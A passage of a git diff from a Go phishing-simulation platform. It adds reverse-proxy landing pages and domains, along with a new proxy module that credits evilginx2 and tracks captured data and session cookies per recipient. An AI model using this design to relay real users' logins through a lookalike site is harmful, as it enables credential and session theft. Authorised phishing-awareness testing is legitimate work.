m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, proxies) +} + +// GetAll gets all proxies using pagination +func (m *Proxy) GetAll(g *gin.Context) { + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + queryArgs, ok := m.handleQueryArgs(g) + if !ok { + return + } + queryArgs.DefaultSortByUpdatedAt() + companyID := companyIDFromRequestQuery(g) + // get proxies + proxies, err := m.ProxyService.GetAll( + g, + session, + companyID, + &repository.ProxyOption{ + QueryArgs: queryArgs, + }, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, proxies) +} + +// GetByID gets a proxy by ID +func (m *Proxy) GetByID(g *gin.Context) { + // handle session + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + id, ok := m.handleParseIDParam(g) + if !ok { + return + } + // get proxy + proxy, err := m.ProxyService.GetByID( + g.Request.Context(), + session, + id, + &repository.ProxyOption{}, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, proxy) +} + +// UpdateByID updates a proxy by ID +func (m *Proxy) UpdateByID(g *gin.Context) { + // handle session + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + id, ok := m.handleParseIDParam(g) + if !ok { + return + } + var req model.Proxy + if ok := m.handleParseRequest(g, &req); !ok { + return + } + // update proxy + err := m.ProxyService.UpdateByID( + g.Request.Context(), + session, + id, + &req, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, map[string]string{ + "message": "Proxy updated", + }) +} + +// DeleteByID deletes a proxy by ID +func (m *Proxy) DeleteByID(g *gin.Context) { + // handle session + session, _, ok := m.handleSession(g) + if !ok { + return + } + // parse request + id, ok := m.handleParseIDParam(g) + if !ok { + return + } + // delete proxy + err := m.ProxyService.DeleteByID( + g.Request.Context(), + session, + id, + ) + // handle response + if ok := m.handleErrors(g, err); !ok { + return + } + m.Response.OK(g, map[string]string{ + "message": "Proxy deleted", + }) +} diff --git a/backend/data/option.go b/backend/data/option.go index 8aa8826..c0b583c 100644 --- a/backend/data/option.go +++ b/backend/data/option.go @@ -23,4 +23,6 @@ const ( OptionKeyRepeatOffenderMonths = "repeat_offender_months" OptionKeyAdminSSOLogin = "sso_login" + + OptionKeyProxyCookieName = "proxy_cookie_name" ) diff --git a/backend/database/campaignTemplate.go b/backend/database/campaignTemplate.go index 4fcb23d..cef2816 100644 --- a/backend/database/campaignTemplate.go +++ b/backend/database/campaignTemplate.go @@ -29,6 +29,10 @@ type CampaignTemplate struct { LandingPageID *uuid.UUID `gorm:"type:uuid;index;"` LandingPage *Page `gorm:"references:LandingPage;foreignKey:LandingPageID;references:ID;"` + // landing page can also be a proxy + LandingProxyID *uuid.UUID `gorm:"type:uuid;index;"` + LandingProxy *Proxy `gorm:"foreignKey:LandingProxyID;references:ID;"` + DomainID *uuid.UUID `gorm:"type:uuid;index;"` Domain *Domain `gorm:"foreignKey:DomainID"` @@ -42,9 +46,17 @@ type CampaignTemplate struct { BeforeLandingPageID *uuid.UUID `gorm:"type:uuid;index"` BeforeLandingPage *Page `gorm:"foreignkey:BeforeLandingPageID;references:ID"` + // before landing page can also be a proxy + BeforeLandingProxyID *uuid.UUID `gorm:"type:uuid;index"` + BeforeLandingProxy *Proxy `gorm:"foreignKey:BeforeLandingProxyID;references:ID"` + AfterLandingPageID *uuid.UUID `gorm:"type:uuid;index"` AfterLandingPage *Page `gorm:"foreignKey:AfterLandingPageID;references:ID"` + // after landing page can also be a proxy + AfterLandingProxyID *uuid.UUID `gorm:"type:uuid;index"` + AfterLandingProxy *Proxy `gorm:"foreignKey:AfterLandingProxyID;references:ID"` + AfterLandingPageRedirectURL string `gorm:"not null;"` EmailID *uuid.UUID `gorm:"type:uuid;index;"` diff --git a/backend/database/domain.go b/backend/database/domain.go index 17ce013..445ba9b 100644 --- a/backend/database/domain.go +++ b/backend/database/domain.go @@ -12,14 +12,18 @@ const ( // Domain is gorm data model type Domain struct { - ID uuid.UUID `gorm:"primary_key;not null;unique;type:uuid;"` - CreatedAt *time.Time `gorm:"not null;index;"` - UpdatedAt *time.Time `gorm:"not null;index;"` - CompanyID *uuid.UUID `gorm:"index;type:uuid;"` - Name string `gorm:"not null;unique;"` - ManagedTLSCerts bool `gorm:"not null;index;default:false"` - OwnManagedTLS bool `gorm:"not null;index;default:false"` - HostWebsite bool `gorm:"not null;"` + ID uuid.UUID `gorm:"primary_key;not null;unique;type:uuid;"` + CreatedAt *time.Time `gorm:"not null;index;"` + UpdatedAt *time.Time `gorm:"not null;index;"` + CompanyID *uuid.UUID `gorm:"index;type:uuid;"` + ProxyID *uuid.UUID `gorm:"index;type:uuid;"` + Name string `gorm:"not null;unique;"` + Type string `gorm:"not null;default:'regular';"` + ProxyTargetDomain string + + ManagedTLSCerts bool `gorm:"not null;index;default:false"` + OwnManagedTLS bool `gorm:"not null;index;default:false"` + HostWebsite bool `gorm:"not null;"` PageContent string PageNotFoundContent string RedirectURL string diff --git a/backend/database/page.go b/backend/database/page.go index 1f37cfe..77bae06 100644 --- a/backend/database/page.go +++ b/backend/database/page.go @@ -13,12 +13,15 @@ const ( // Page is a gorm data model type Page struct { - ID *uuid.UUID `gorm:"primary_key;not null;unique;type:uuid"` - CreatedAt *time.Time `gorm:"not null;index;"` - UpdatedAt *time.Time `gorm:"not null;index"` - CompanyID *uuid.UUID `gorm:"index;uniqueIndex:idx_pages_unique_name_and_company_id;type:uuid"` - Name string `gorm:"not null;index;uniqueIndex:idx_pages_unique_name_and_company_id;"` - Content string `gorm:"not null;"` + ID *uuid.UUID `gorm:"primary_key;not null;unique;type:uuid"` + CreatedAt *time.Time `gorm:"not null;index;"` + UpdatedAt *time.Time `gorm:"not null;index"` + CompanyID *uuid.UUID `gorm:"index;uniqueIndex:idx_pages_unique_name_and_company_id;type:uuid"` + Name string `gorm:"not null;index;uniqueIndex:idx_pages_unique_name_and_company_id;"` + Content string `gorm:"not null;"` + Type string `gorm:"not null;default:'regular';"` + TargetURL string + ProxyConfig string // could has-one Company *Company diff --git a/backend/database/proxy.go b/backend/database/proxy.go new file mode 100644 index 0000000..2497b3e --- /dev/null +++ b/backend/database/proxy.go @@ -0,0 +1,37 @@ +package database + +import ( + "time" + + "github.com/google/uuid" + "gorm.io/gorm" +) + +const ( + PROXY_TABLE = "proxies" +) + +// Proxy is a gorm data model +type Proxy struct { + ID *uuid.UUID `gorm:"primary_key;not null;unique;type:uuid"` + CreatedAt *time.Time `gorm:"not null;index;"` + UpdatedAt *time.Time `gorm:"not null;index"` + CompanyID *uuid.UUID `gorm:"index;uniqueIndex:idx_proxies_unique_name_and_company_id;type:uuid"` + Name string `gorm:"not null;index;uniqueIndex:idx_proxies_unique_name_and_company_id;"` + Description string `gorm:"type:text"` + StartURL string `gorm:"not null;"` + ProxyConfig string `gorm:"type:text;not null;"` + + // could has-one + Company *Company +} + +func (e *Proxy) Migrate(db *gorm.DB) error { + // SQLITE + // ensure name + company id is unique + return UniqueIndexNameAndNullCompanyID(db, "proxies") +} + +func (Proxy) TableName() string { + return PROXY_TABLE +} diff --git a/backend/main.go b/backend/main.go index ef69f2a..92ab682 100644 --- a/backend/main.go +++ b/backend/main.go @@ -130,7 +130,7 @@ func main() { *flagConfigPath, ) if err != nil { - golog.Fatalf("failed to config: %s", err) + golog.Fatalf("failed to setup config: %s", err) } // setup database connection db, err := app.SetupDatabase(conf) diff --git a/backend/model/campaignTemplate.go b/backend/model/campaignTemplate.go index 2107cf3..b5eb9d7 100644 --- a/backend/model/campaignTemplate.go +++ b/backend/model/campaignTemplate.go @@ -26,12 +26,24 @@ type CampaignTemplate struct { BeforeLandingPageID nullable.Nullable[uuid.UUID] `json:"beforeLandingPageID"` BeforeLandingePage *Page `json:"beforeLandingPage"` + // before landing page can also be a proxy + BeforeLandingProxyID nullable.Nullable[uuid.UUID] `json:"beforeLandingProxyID"` + BeforeLandingProxy *Proxy `json:"beforeLandingProxy"` + LandingPageID nullable.Nullable[uuid.UUID] `json:"landingPageID"` LandingPage *Page `json:"landingPage"` + // landing page can also be a proxy + LandingProxyID nullable.Nullable[uuid.UUID] `json:"landingProxyID"` + LandingProxy *Proxy `json:"landingProxy"` + AfterLandingPageID nullable.Nullable[uuid.UUID] `json:"afterLandingPageID"` AfterLandingPage *Page `json:"afterLandingPage"` + // after landing page can also be a proxy + AfterLandingProxyID nullable.Nullable[uuid.UUID] `json:"afterLandingProxyID"` + AfterLandingProxy *Proxy `json:"afterLandingProxy"` + AfterLandingPageRedirectURL nullable.Nullable[vo.OptionalString255] `json:"afterLandingPageRedirectURL"` URLIdentifierID nullable.Nullable[*uuid.UUID] `json:"urlIdentifierID"` @@ -80,6 +92,41 @@ func (c *CampaignTemplate) Validate() error { if err := validate.NullableFieldRequired("urlPath", c.URLPath); err != nil { return err } + + // validate that only one type is set per stage + // before landing page: can have neither (optional), or one type, but not both + _, errBeforePage := c.BeforeLandingPageID.Get() + _, errBeforeProxy := c.BeforeLandingProxyID.Get() + if errBeforePage == nil && errBeforeProxy == nil { + return errs.NewValidationError( + errors.New("before landing page cannot be both a page and a proxy"), + ) + } + + // landing page: must have exactly one type (required) + _, errLandingPage := c.LandingPageID.Get() + _, errLandingProxy := c.LandingProxyID.Get() + if errLandingPage == nil && errLandingProxy == nil { + return errs.NewValidationError( + errors.New("landing page cannot be both a page and a proxy"), + ) + + } + if errLandingPage != nil && errLandingProxy != nil { + return errs.NewValidationError( + errors.New("landing page is required (must be either a page or a proxy)"), + ) + } + + // after landing page: can have neither (optional), or one type, but not both + _, errAfterPage := c.AfterLandingPageID.Get() + _, errAfterProxy := c.AfterLandingProxyID.Get() + if errAfterPage == nil && errAfterProxy == nil { + return errs.NewValidationError( + errors.New("after landing page cannot be both a page and a proxy"), + ) + } + return nil } @@ -110,6 +157,14 @@ func (c *CampaignTemplate) ToDBMap() map[string]any { } } + if c.BeforeLandingProxyID.IsSpecified() { + if c.BeforeLandingProxyID.IsNull() { + m["before_landing_proxy_id"] = nil + } else { + m["before_landing_proxy_id"] = c.BeforeLandingProxyID.MustGet() + } + } + if c.LandingPageID.IsSpecified() { if c.LandingPageID.IsNull() { m["landing_page_id"] = nil @@ -118,6 +173,14 @@ func (c *CampaignTemplate) ToDBMap() map[string]any { } } + if c.LandingProxyID.IsSpecified() { + if c.LandingProxyID.IsNull() { + m["landing_proxy_id"] = nil + } else { + m["landing_proxy_id"] = c.LandingProxyID.MustGet() + } + } + if c.AfterLandingPageID.IsSpecified() { if c.AfterLandingPageID.IsNull() { m["after_landing_page_id"] = nil @@ -125,6 +188,14 @@ func (c *CampaignTemplate) ToDBMap() map[string]any { m["after_landing_page_id"] = c.AfterLandingPageID.MustGet() } } + + if c.AfterLandingProxyID.IsSpecified() { + if c.AfterLandingProxyID.IsNull() { + m["after_landing_proxy_id"] = nil + } else { + m["after_landing_proxy_id"] = c.AfterLandingProxyID.MustGet() + } + } if c.AfterLandingPageRedirectURL.IsSpecified() { if c.AfterLandingPageRedirectURL.IsNull() { m["after_landing_page_redirect_url"] = nil @@ -177,10 +248,14 @@ func (c *CampaignTemplate) ToDBMap() map[string]any { _, errAPISender := c.APISenderID.Get() _, errEmail := c.EmailID.Get() _, errLandingPage := c.LandingPageID.Get() + _, errLandingProxy := c.LandingProxyID.Get() + + // landing page is required (either page or proxy) + hasLanding := errLandingPage == nil || errLandingProxy == nil m["is_usable"] = errDomain == nil && errEmail == nil && - errLandingPage == nil && + hasLanding && (errSMTP == nil || errAPISender == nil) return m diff --git a/backend/model/domain.go b/backend/model/domain.go index 49324e7..b9ea991 100644 --- a/backend/model/domain.go +++ b/backend/model/domain.go @@ -13,13 +13,15 @@ import ( ) type Domain struct { - ID nullable.Nullable[uuid.UUID] `json:"id"` - CreatedAt *time.Time `json:"createdAt"` - UpdatedAt *time.Time `json:"updatedAt"` - Name nullable.Nullable[vo.String255] `json:"name"` - HostWebsite nullable.Nullable[bool] `json:"hostWebsite"` - ManagedTLS nullable.Nullable[bool] `json:"managedTLS"` - OwnManagedTLS nullable.Nullable[bool] `json:"ownManagedTLS"` + ID nullable.Nullable[uuid.UUID] `json:"id"` + CreatedAt *time.Time `json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + Name nullable.Nullable[vo.String255] `json:"name"` + Type nullable.Nullable[vo.String32] `json:"type"` // "regular" or "proxy" + ProxyTargetDomain nullable.Nullable[vo.OptionalString255] `json:"proxyTargetDomain"` // target URL for proxy (can be full URL or domain) + HostWebsite nullable.Nullable[bool] `json:"hostWebsite"` + ManagedTLS nullable.Nullable[bool] `json:"managedTLS"` + OwnManagedTLS nullable.Nullable[bool] `json:"ownManagedTLS"` // private key OwnManagedTLSKey nullable.Nullable[string] `json:"ownManagedTLSKey"` // cert @@ -28,6 +30,7 @@ type Domain struct { PageNotFoundContent nullable.Nullable[vo.OptionalString1MB] `json:"pageNotFoundContent"` RedirectURL nullable.Nullable[vo.OptionalString1024] `json:"redirectURL"` CompanyID nullable.Nullable[uuid.UUID] `json:"companyID"` + ProxyID nullable.Nullable[uuid.UUID] `json:"proxyID"` Company *Company `json:"company"` } @@ -36,20 +39,45 @@ func (d *Domain) Validate() error { if err := validate.NullableFieldRequired("name", d.Name); err != nil { return err } - if err := validate.NullableFieldRequired("hostWebsite", d.HostWebsite); err != nil { - return err + + // set default type if not specified + if !d.Type.IsSpecified() { + d.Type.Set(*vo.NewString32Must("regular")) } - if err := validate.NullableFieldRequired("managedTLS", d.ManagedTLS); err != nil { - return err + + domainType, err := d.Type.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("type is required"), "type") } - if err := validate.NullableFieldRequired("pageContent", d.PageContent); err != nil { - return err + + // validate type is either "regular" or "proxy" + if domainType.String() != "regular" && domainType.String() != "proxy" { + return validate.WrapErrorWithField(errors.New("type must be 'regular' or 'proxy'"), "type") } - if err := validate.NullableFieldRequired("pageNotFoundContent", d.PageNotFoundContent); err != nil { - return err - } - if err := validate.NullableFieldRequired("redirectURL", d.RedirectURL); err != nil { - return err + + if domainType.String() == "proxy" { + // proxy domains require proxyTargetDomain + if err := validate.NullableFieldRequired("proxyTargetDomain", d.ProxyTargetDomain); err != nil { + return err + } + // proxy domains don't need page content validation + } else { + // regular domains need standard validation + if err := validate.NullableFieldRequired("hostWebsite", d.HostWebsite); err != nil { + return err + } + if err := validate.NullableFieldRequired("managedTLS", d.ManagedTLS); err != nil { + return err + } + if err := validate.NullableFieldRequired("pageContent", d.PageContent); err != nil { + return err + } + if err := validate.NullableFieldRequired("pageNotFoundContent", d.PageNotFoundContent); err != nil { + return err + } + if err := validate.NullableFieldRequired("redirectURL", d.RedirectURL); err != nil { + return err + } } // // @@ -101,6 +129,18 @@ func (d *Domain) ToDBMap() map[string]any { m["name"] = name.String() } } + if d.Type.IsSpecified() { + m["type"] = "regular" + if domainType, err := d.Type.Get(); err == nil { + m["type"] = domainType.String() + } + } + if d.ProxyTargetDomain.IsSpecified() { + m["proxy_target_domain"] = nil + if proxyTargetDomain, err := d.ProxyTargetDomain.Get(); err == nil { + m["proxy_target_domain"] = proxyTargetDomain.String() + } + } if d.HostWebsite.IsSpecified() { m["host_website"] = nil if hostWebsite, err := d.HostWebsite.Get(); err == nil { @@ -149,18 +189,28 @@ func (d *Domain) ToDBMap() map[string]any { m["own_managed_tls"] = d.OwnManagedTLS.MustGet() } } + if d.ProxyID.IsSpecified() { + if d.ProxyID.IsNull() { + m["proxy_id"] = nil + } else { + m["proxy_id"] = d.ProxyID.MustGet() + } + } return m } // DomainOverview is a subset of the domain as used as read-only type DomainOverview struct { - ID uuid.UUID `json:"id,omitempty"` - CreatedAt *time.Time `json:"createdAt"` - UpdatedAt *time.Time `json:"updatedAt"` - Name string `json:"name"` - HostWebsite bool `json:"hostWebsite"` - ManagedTLS bool `json:"managedTLS"` - OwnManagedTLS bool `json:"ownManagedTLS"` - RedirectURL string `json:"redirectURL"` - CompanyID *uuid.UUID `json:"companyID"` + ID uuid.UUID `json:"id,omitempty"` + CreatedAt *time.Time `json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + Name string `json:"name"` + Type string `json:"type"` + ProxyTargetDomain string `json:"proxyTargetDomain"` + HostWebsite bool `json:"hostWebsite"` + ManagedTLS bool `json:"managedTLS"` + OwnManagedTLS bool `json:"ownManagedTLS"` + RedirectURL string `json:"redirectURL"` + CompanyID *uuid.UUID `json:"companyID"` + ProxyID *uuid.UUID `json:"proxyID"` } diff --git a/backend/model/page.go b/backend/model/page.go index ce6348d..1adedeb 100644 --- a/backend/model/page.go +++ b/backend/model/page.go @@ -3,6 +3,7 @@ package model import ( "time" + "github.com/go-errors/errors" "github.com/google/uuid" "github.com/oapi-codegen/nullable" "github.com/phishingclub/phishingclub/validate" @@ -11,12 +12,15 @@ import ( // Page is a Page type Page struct { - ID nullable.Nullable[uuid.UUID] `json:"id"` - CreatedAt *time.Time `json:"createdAt"` - UpdatedAt *time.Time `json:"updatedAt"` - CompanyID nullable.Nullable[uuid.UUID] `json:"companyID"` - Name nullable.Nullable[vo.String64] `json:"name"` - Content nullable.Nullable[vo.OptionalString1MB] `json:"content"` + ID nullable.Nullable[uuid.UUID] `json:"id"` + CreatedAt *time.Time `json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + CompanyID nullable.Nullable[uuid.UUID] `json:"companyID"` + Name nullable.Nullable[vo.String64] `json:"name"` + Content nullable.Nullable[vo.OptionalString1MB] `json:"content"` + Type nullable.Nullable[vo.String32] `json:"type"` // "regular" or "proxy" + TargetURL nullable.Nullable[vo.OptionalString1024] `json:"targetURL"` // target url for proxy pages + ProxyConfig nullable.Nullable[vo.OptionalString1MB] `json:"proxyConfig"` // yaml configuration for proxy Company *Company `json:"-"` } @@ -26,9 +30,37 @@ func (p *Page) Validate() error { if err := validate.NullableFieldRequired("name", p.Name); err != nil { return err } - if err := validate.NullableFieldRequired("content", p.Content); err != nil { - return err + + // set default type if not specified + if !p.Type.IsSpecified() { + p.Type.Set(*vo.NewString32Must("regular")) } + + pageType, err := p.Type.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("type is required"), "type") + } + + // validate type is either "regular" or "proxy" + if pageType.String() != "regular" && pageType.String() != "proxy" { + return validate.WrapErrorWithField(errors.New("type must be 'regular' or 'proxy'"), "type") + } + + if pageType.String() == "proxy" { + // proxy pages require targetURL and proxyConfig + if err := validate.NullableFieldRequired("targetURL", p.TargetURL); err != nil { + return err + } + if err := validate.NullableFieldRequired("proxyConfig", p.ProxyConfig); err != nil { + return err + } + } else { + // regular pages require content + if err := validate.NullableFieldRequired("content", p.Content); err != nil { + return err + } + } + return nil } @@ -49,6 +81,24 @@ func (p *Page) ToDBMap() map[string]any { m["content"] = content.String() } } + if p.Type.IsSpecified() { + m["type"] = "regular" + if pageType, err := p.Type.Get(); err == nil { + m["type"] = pageType.String() + } + } + if p.TargetURL.IsSpecified() { + m["target_url"] = nil + if targetURL, err := p.TargetURL.Get(); err == nil { + m["target_url"] = targetURL.String() + } + } + if p.ProxyConfig.IsSpecified() { + m["proxy_config"] = nil + if proxyConfig, err := p.ProxyConfig.Get(); err == nil { + m["proxy_config"] = proxyConfig.String() + } + } if p.CompanyID.IsSpecified() { if p.CompanyID.IsNull() { m["company_id"] = nil diff --git a/backend/model/proxy.go b/backend/model/proxy.go new file mode 100644 index 0000000..50e520e --- /dev/null +++ b/backend/model/proxy.go @@ -0,0 +1,108 @@ +package model + +import ( + "time" + + "github.com/go-errors/errors" + "github.com/google/uuid" + "github.com/oapi-codegen/nullable" + "github.com/phishingclub/phishingclub/validate" + "github.com/phishingclub/phishingclub/vo" +) + +// Proxy is a proxy configuration +type Proxy struct { + ID nullable.Nullable[uuid.UUID] `json:"id"` + CreatedAt *time.Time `json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + CompanyID nullable.Nullable[uuid.UUID] `json:"companyID"` + Name nullable.Nullable[vo.String64] `json:"name"` + Description nullable.Nullable[vo.OptionalString1024] `json:"description"` + StartURL nullable.Nullable[vo.String1024] `json:"startURL"` + ProxyConfig nullable.Nullable[vo.String1MB] `json:"proxyConfig"` + + Company *Company `json:"-"` +} + +// Validate checks if the Proxy has a valid state +func (m *Proxy) Validate() error { + if err := validate.NullableFieldRequired("name", m.Name); err != nil { + return err + } + + if err := validate.NullableFieldRequired("startURL", m.StartURL); err != nil { + return err + } + + if err := validate.NullableFieldRequired("proxyConfig", m.ProxyConfig); err != nil { + return err + } + + // validate start URL format + startURL, err := m.StartURL.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("start URL is required"), "startURL") + } + + startURLStr := startURL.String() + if startURLStr == "" { + return validate.WrapErrorWithField(errors.New("start URL cannot be empty"), "startURL") + } + + // validate that start URL is a valid, full URL + if err := validate.ErrorIfInvalidURL(startURLStr); err != nil { + return validate.WrapErrorWithField(err, "startURL") + } + + return nil +} + +// ToDBMap converts the fields that can be stored or updated to a map +// if the value is nullable and not set, it is not included +// if the value is nullable and set, it is included, if it is null, it is set to nil +func (m *Proxy) ToDBMap() map[string]any { + dbMap := map[string]any{} + if m.Name.IsSpecified() { + dbMap["name"] = nil + if name, err := m.Name.Get(); err == nil { + dbMap["name"] = name.String() + } + } + if m.Description.IsSpecified() { + dbMap["description"] = nil + if description, err := m.Description.Get(); err == nil { + dbMap["description"] = description.String() + } + } + if m.StartURL.IsSpecified() { + dbMap["start_url"] = nil + if startURL, err := m.StartURL.Get(); err == nil { + dbMap["start_url"] = startURL.String() + } + } + if m.ProxyConfig.IsSpecified() { + dbMap["proxy_config"] = nil + if proxyConfig, err := m.ProxyConfig.Get(); err == nil { + dbMap["proxy_config"] = proxyConfig.String() + } + } + if m.CompanyID.IsSpecified() { + if m.CompanyID.IsNull() { + dbMap["company_id"] = nil + } else { + dbMap["company_id"] = m.CompanyID.MustGet() + } + } + return dbMap +} + +// ProxyOverview is a subset of the Proxy as used as read-only +type ProxyOverview struct { + ID uuid.UUID `json:"id,omitempty"` + CreatedAt *time.Time `json:"createdAt"` + UpdatedAt *time.Time `json:"updatedAt"` + Name string `json:"name"` + Description string `json:"description"` + StartURL string `json:"startURL"` + CompanyID *uuid.UUID `json:"companyID"` +} diff --git a/backend/proxy/proxy.go b/backend/proxy/proxy.go new file mode 100644 index 0000000..b047b7e --- /dev/null +++ b/backend/proxy/proxy.go @@ -0,0 +1,2091 @@ +package proxy + +import ( + "bytes" + "compress/flate" + "compress/gzip" + "context" + "crypto/tls" + "encoding/json" + "fmt" + "io" + "net/http" + "net/http/cookiejar" + "net/url" + "regexp" + "sort" + "strings" + "sync" + "sync/atomic" + "time" + + "github.com/go-errors/errors" + "github.com/google/uuid" + "github.com/phishingclub/phishingclub/cache" + "github.com/phishingclub/phishingclub/data" + "github.com/phishingclub/phishingclub/database" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/repository" + "github.com/phishingclub/phishingclub/server" + "github.com/phishingclub/phishingclub/service" + "github.com/phishingclub/phishingclub/utils" + "github.com/phishingclub/phishingclub/vo" + "go.uber.org/zap" + "gopkg.in/yaml.v3" +) + +/* +This source file is a modified / highly inspired by evilginx2 (https://github.com/kgretzky/evilginx2/) +Which was inspired by the bettercap (https://github.com/bettercap/bettercap) project. +Evilginx is a fantastic MITM phishing project - so check it out! + +Thank you! +*/ + +/* +Portions of this code are derived from EvilGinx2 (https://github.com/kgretzky/evilginx2) +Copyright (c) 2017-2023 Kuba Gretzky (@kgretzky) +Licensed under BSD-3-Clause License + +EvilGinx2 itself incorporates code from the Bettercap project: +https://github.com/bettercap/bettercap +Copyright (c) 2016-2023 Simone Margaritelli (@evilsocket) + +This derivative work is licensed under AGPL-3.0. +See THIRD_PARTY_LICENSES.md for complete license texts. +*/ + +const ( + PROXY_COOKIE_MAX_AGE = 3600 + CONVERT_TO_ORIGINAL_URLS = 0 + CONVERT_TO_PHISHING_URLS = 1 +) + +var ( + MATCH_URL_REGEXP = regexp.MustCompile(`\b(http[s]?:\/\/|\\\\|http[s]:\\x2F\\x2F)(([A-Za-z0-9-]{1,63}\.)?[A-Za-z0-9]+(-[a-z0-9]+)*\.)+(arpa|root|aero|biz|cat|com|coop|edu|gov|info|int|jobs|mil|mobi|museum|name|net|org|pro|tel|travel|bot|inc|game|xyz|cloud|live|today|online|shop|tech|art|site|wiki|ink|vip|lol|club|click|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cx|cy|cz|dev|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)|([0-9]{1,3}\.{3}[0-9]{1,3})\b`) + MATCH_URL_REGEXP_WITHOUT_SCHEME = regexp.MustCompile(`\b(([A-Za-z0-9-]{1,63}\.)?[A-Za-z0-9]+(-[a-z0-9]+)*\.)+(arpa|root|aero|biz|cat|com|coop|edu|gov|info|int|jobs|mil|mobi|museum|name|net|org|pro|tel|travel|bot|inc|game|xyz|cloud|live|today|online|shop|tech|art|site|wiki|ink|vip|lol|club|click|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cx|cy|cz|dev|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|st|su|sv|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|um|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)|([0-9]{1,3}\.{3}[0-9]{1,3})\b`) +) + +type ProxySession struct { + ID string + CampaignRecipientID *uuid.UUID + CampaignID *uuid.UUID + RecipientID *uuid.UUID + Campaign *model.Campaign + Domain *database.Domain + TargetDomain string + Config sync.Map // map[string]service.ProxyServiceDomainConfig + CreatedAt time.Time + RequiredCaptures sync.Map // map[string]bool + CapturedData sync.Map // map[string]map[string]string + NextPageType atomic.Value // string + IsComplete atomic.Bool + CookieBundleSubmitted atomic.Bool +} + +// RequestContext holds all the context data for a proxy request +type RequestContext struct { + SessionID string + SessionCreated bool + PhishDomain string + TargetDomain string + Domain *database.Domain + ProxyConfig *service.ProxyServiceConfigYAML + Session *ProxySession + ConfigMap map[string]service.ProxyServiceDomainConfig + CampaignRecipientID *uuid.UUID + ParamName string +} + +type ProxyHandler struct { + logger *zap.SugaredLogger + sessions sync.Map // map[string]*ProxySession + campaignRecipientSessions sync.Map // map[string]string (campaignRecipientID -> sessionID) + PageRepository *repository.Page + CampaignRecipientRepository *repository.CampaignRecipient + CampaignRepository *repository.Campaign + CampaignTemplateRepository *repository.CampaignTemplate + DomainRepository *repository.Domain + ProxyRepository *repository.Proxy + IdentifierRepository *repository.Identifier + CampaignService *service.Campaign + cookieName string +} + +func NewProxyHandler( + logger *zap.SugaredLogger, + pageRepository *repository.Page, + campaignRecipientRepository *repository.CampaignRecipient, + campaignRepository *repository.Campaign, + campaignTemplateRepository *repository.CampaignTemplate, + domainRepository *repository.Domain, + proxyRepository *repository.Proxy, + identifierRepository *repository.Identifier, + campaignService *service.Campaign, + cookieName string, +) *ProxyHandler { + return &ProxyHandler{ + logger: logger, + sessions: sync.Map{}, + PageRepository: pageRepository, + CampaignRecipientRepository: campaignRecipientRepository, + CampaignRepository: campaignRepository, + CampaignTemplateRepository: campaignTemplateRepository, + DomainRepository: domainRepository, + ProxyRepository: proxyRepository, + IdentifierRepository: identifierRepository, + CampaignService: campaignService, + cookieName: cookieName, + } +} + +// HandleHTTPRequest processes incoming http requests through the proxy +func (m *ProxyHandler) HandleHTTPRequest(w http.ResponseWriter, req *http.Request, domain *database.Domain) error 